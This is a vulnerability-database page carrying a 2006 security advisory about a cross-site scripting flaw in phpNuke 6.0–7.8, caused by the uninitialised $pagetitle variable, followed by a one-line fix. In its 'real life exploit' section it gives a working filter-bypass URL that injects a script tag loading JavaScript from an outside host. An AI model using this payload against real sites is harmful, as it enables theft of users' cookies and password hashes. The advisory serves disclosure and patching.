Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

waraxe-2006-SA-044.txt

🗓️ 14 Feb 2006 00:00:00Reported by Janek Vind aka waraxeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

PHP-Nuke XSS vulnerability in versions 6.0 to 7.

Code
`  
  
{================================================================================}  
{ [waraxe-2006-SA#044] }  
{================================================================================}  
{ }  
{ [ XSS in phpNuke 7.8 and older versions] }  
{ }  
{================================================================================}  
  
Author: Janek Vind "waraxe"  
Date: 13. February 2006  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-44.html  
  
  
Target software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
phpNuke 6.0 - 7.8  
  
Homepage: http://phpnuke.org/  
  
  
What is phpNuke ?  
  
PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet.  
The Administrator has total control of his web site, registered users, and he will have in  
the hand a powerful assembly of tools to maintain an active and 100% interactive web site  
using databases.  
  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Potentially harmful cross-site scripting bug has been found in phpNuke software.  
All versions from 6.0 to 7.8 are affected. Version 7.9 has not been tested against this bug,  
but probably it is affected too. As in case of any XSS bugs, there can be many ways to   
exploit this bug, for example stealing the cookies, containing username/hashed password.  
  
  
Details  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
So what is the cause of this XSS case? As common in phpNuke world, problem lies in  
uninitialized variable - "$pagetitle". This global variable is used for transfer page  
title from module worker-code to "head()" function in "header.php" file.  
  
Looking at source ("header.php" line ~ 28):  
  
----------------[ from source code ]------------------  
  
function head() {  
global $slogan, $sitename, $banners, $nukeurl, $Version_Num, $artpage, $topic,  
$hlpfile, $user, $hr, $theme, $cookie, $bgcolor1, $bgcolor2, $bgcolor3, $bgcolor4,  
$textcolor1, $textcolor2, $forumpage, $adminpage, $userpage, $pagetitle;  
include("includes/ipban.php");  
$ThemeSel = get_theme();  
include("themes/$ThemeSel/theme.php");  
echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n";  
echo "<html>\n";  
echo "<head>\n";  
echo "<title>$sitename $pagetitle</title>\n";  
include("includes/meta.php");  
include("includes/javascript.php");  
----------------[ /from source code ]-----------------  
  
So we see, that "$pagetitle" is directly rendered to html code. And after searching in  
source code, we can see that it is not initialized by default.  
Hmm, what about running some tests ...  
  
  
Let's try "http://localhost/nuke78/?pagetitle=w00t></title></head><body>test"  
  
  
and we see, that html tags injection is really possible.  
Now comes the hard part - how to inject scripting code? Phpnuke is using some anti-XSS  
filters agaist injection, so direct attack with "<script>" and other usual tags will not  
succeed. Well, as always, there can be found ways to bypass filters and after playing some  
time with various injection tricki, I found this possibility:  
  
[------ real life exploit ------]  
  
http://localhost/nuke78/?pagetitle=kala</title></head><script+src=http://www.waraxe.us/~kama/p0hh.js?  
  
[----- /real life exploit ------]  
  
  
This method was tested successfully with 3 browsers - IE 6, Firefox 1.5.0.1 and Opera 8.51 .  
So it seems, that phpnuke anti-xss filter must be made to be more bulletproof ...  
  
Bye all and have a nice day ;)  
  
  
  
How to fix:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Write one code line to "mainfile.php":  
  
$pagetitle = '';  
  
This will initialize affected variable and patch the hole.  
  
  
Greetings:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Greetz to LINUX, Heintz, y3dips, shai-tan, slimjim100, zer0-c00l and  
all other active members from waraxe forum !  
  
Raido Kerna - tervitused!  
  
  
Additional resources:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
DX expeditions database - http://www.dxdb.com/  
  
HDD data recovery - http://www.hdd911.com/  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[email protected]  
Janek Vind "waraxe"  
  
Homepage: http://www.waraxe.us/  
  
---------------------------------- [ EOF ] ------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
phpnukecross-site scriptingxsssecurity vulnerabilityweb applicationversion 7.9cookies
27